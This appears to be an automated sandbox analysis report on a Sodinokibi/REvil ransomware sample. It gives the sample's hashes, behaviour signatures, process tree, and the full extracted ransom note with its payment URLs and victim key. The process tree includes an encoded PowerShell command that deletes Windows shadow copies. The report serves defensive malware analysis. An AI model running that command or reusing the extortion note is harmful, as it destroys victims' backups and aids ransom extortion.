Analysis

  • max time kernel
    133s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:24

General

  • Target

    a5a2f608fbd40bf76178db66e7e789fbbabb3b35fc284be1c10615dbfa0853c5.exe

  • Size

    166KB

  • MD5

    eae6610db384610ede43f9b441597d19

  • SHA1

    d3e189d45baf5429eba80a7b8d64551d8f00d3d1

  • SHA256

    a5a2f608fbd40bf76178db66e7e789fbbabb3b35fc284be1c10615dbfa0853c5

  • SHA512

    ece1f2f33f98b443b24f243e867ab92766ddbd2dab9a6dbeecff293e096c6ddfce019978dca0eae740cae88f27c5dd6bccdf9bcce924422593960e74b8a4b71c

Malware Config

Extracted

Path

C:\771c6571gn-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 771c6571gn. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F1026148FA4EE74 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3F1026148FA4EE74 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: rpUYNSB/B8VIfexPEJIK4XCplqfRgkkr2yOlFqrIohxQZ4NMTdXaJqi+a59sHdR1 MEkZ5O1JcOBL7E2P+LKS4PPzjLzSnsKJoEsWmP+G33jhKayT603/r2wkbwbAMNFE JAcXRY3G/Kpc6poXnh+CcB9PQFGmXBDurXly87NLvoCUzYtFaruCVwnUemm4RTNc yMxLikIBSPd7qdu5GL8jVxOgY68/K4a3Iz37QMtrTx5a9Ww2+36wAntih9ToZH1w TGRESH7ywaHmChUhJPLCdTmnmQFGBckSIAalRFtGmN4poxFJT3N1JFFbnHdOzWSi 5zSdeJwCYdlvsV3oLngINlEAm/qwgpbya+XSzHNToI9bvRyTVJB6zXo/7i0NfdJH PsEp6NE+Y5rcAUlAdWD1YM32wR6nHTCn0tSVk2bgvgEw23683GmNSrVQbZ/i46sb CK4pbK/pQYWqKMEiKnwqVLCcK3sOXOA+dRTqtyQ8m6ZfrNRJfg0Wo3E2rXkppZ36 CiVPVWYLaI3H5rfEiSpeQCi2MRZqh8IBcWGHA00RmaSCRwHANMKlhQPqpp8TeKHf IXE4/HAcr4UJJJwYcXf+6D9IkE0puga+shzf6iO8ey7ACGJxcIE68kvKEZeM3FHV zMl4CnrAkhvdGtp1yaFNrGG4DWot1etFzLLZzwqLzA8Kt4mV8nnMfXG4cO7TdZg+ rnU5q9+ZO5rjY6nQsWGsMA1ySGEMhnHKjEbTrvHaV71EHIgtaBA6WzAVaGPaZauM pGlZHqbcAVJOosskQ79tZDQvsXhdFugcEJraP1eBe0ewmfswsmChXAhaMgM6JsPV hbaIDh7jmDnDPhbsZ9tIK2YSgs/3Fl1HPa04y76LEMgIZM5KP57LQbFTKDL5f5Re RZJayLYjqIRy72HCnrJtIlX4PslcUEt5Te9Rv8Gh5FKCHqEwycT+KTJXoWxhEviG bNOKEMOMB4TK1EvZv3xEi0hpV8RBAvprep3DKDU8AjQ66k8+DfAHrhwNFjpValNO IWi7RlKT3xdhN45Pb136WnPtRXbeM9KdEBaTuSaeevfo4Hb7YiRnK/3gcdede7zv sxYtiSukTIh0D0ymcaxtoVRmRPEtrMOjXuPV6k1dekttHvYpRD3lkFzIv6vyfcaj K5mcPkMC6JYsGorfrX6WXcqmbyzU3twwaIdQgyqjZmVc6ygL/o09u2ImoG59OaLf C7qMb91wLsrTpI5nJMuqp9UqaLH+cV/4Snl+TlXV1D3a0MYvJnIWJdX5ZLNH1bTW wtWlI0aSs+J0wpNASCCoTcCs7yGQ/Cyg9+S23tbdC40= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F1026148FA4EE74

http://decryptor.cc/3F1026148FA4EE74

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a5a2f608fbd40bf76178db66e7e789fbbabb3b35fc284be1c10615dbfa0853c5.exe
    "C:\Users\Admin\AppData\Local\Temp\a5a2f608fbd40bf76178db66e7e789fbbabb3b35fc284be1c10615dbfa0853c5.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1612
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1064
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2008

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1612-55-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp
      Filesize

      8KB

    • memory/1612-57-0x00000000028C0000-0x00000000028C2000-memory.dmp
      Filesize

      8KB

    • memory/1612-58-0x00000000028C2000-0x00000000028C4000-memory.dmp
      Filesize

      8KB

    • memory/1612-59-0x00000000028C4000-0x00000000028C7000-memory.dmp
      Filesize

      12KB

    • memory/1612-56-0x000007FEF2D90000-0x000007FEF38ED000-memory.dmp
      Filesize

      11.4MB

    • memory/1612-60-0x00000000028CB000-0x00000000028EA000-memory.dmp
      Filesize

      124KB

    • memory/1664-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
      Filesize

      8KB